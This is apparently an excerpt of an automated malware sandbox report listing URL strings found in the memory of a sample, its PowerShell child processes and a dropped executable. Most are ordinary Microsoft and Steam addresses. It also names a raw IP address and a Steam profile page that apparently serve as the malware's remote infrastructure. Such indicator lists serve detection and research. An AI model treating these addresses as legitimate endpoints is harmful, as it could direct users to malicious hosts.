Source: powershell.exe, 00000005.00000002.1563697900.00000000086C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1610889169.000000000780F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1703471346.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000005.00000002.1563697900.00000000086C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1610889169.000000000784D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microsoft
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://github.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://github.comd
Source: powershell.exe, 00000005.00000002.1558683585.0000000006089000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1606744691.00000000061B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A92000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://raw.githubusercontent.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A92000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://raw.githubusercontent.comd
Source: powershell.exe, 00000005.00000002.1555257254.0000000005177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567151650.0000000004414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1555257254.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1619557449.000000000480D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.0000000005151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1695247796.0000000004679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1555257254.0000000005177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr; String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748291843.0000000000193000.00000004.00000010.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr; String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr; String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.1610889169.000000000780F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.coU
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr; String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199804377619[1].htm0.14.dr; String found in binary or memory: https://37.27.43.98
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2523079878.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://37.27.43.98/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://37.27.43.98/(
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://37.27.43.98/5
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://37.27.43.98/://Z
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://37.27.43.98/A
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://37.27.43.98/B_F
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://37.27.43.98/T
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://37.27.43.98/icate
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://37.27.43.98/n
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://37.27.43.98/r
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://37.27.43.98/rG8
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://37.27.43.98/s
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://37.27.43.98/v
Source: powershell.exe, 00000007.00000002.1619557449.0000000004839000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1695247796.00000000046A5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore6LR
Source: powershell.exe, 00000003.00000002.1567151650.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567151650.00000000043F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1555257254.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1619557449.0000000004848000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.0000000005151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1695247796.00000000046B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.P
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
Source: 76561199804377619[1].htm0.14.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://community.cloudflare.
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://community.cloudflare.steamsta
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=LjouqOsWbS
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&l=english&am
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&l=en
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748291843.0000000000193000.00000004.00000010.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
